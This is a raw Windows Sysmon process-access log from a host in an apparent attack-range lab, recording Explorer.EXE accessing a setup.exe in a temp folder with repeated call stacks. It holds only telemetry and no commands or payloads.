13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.stora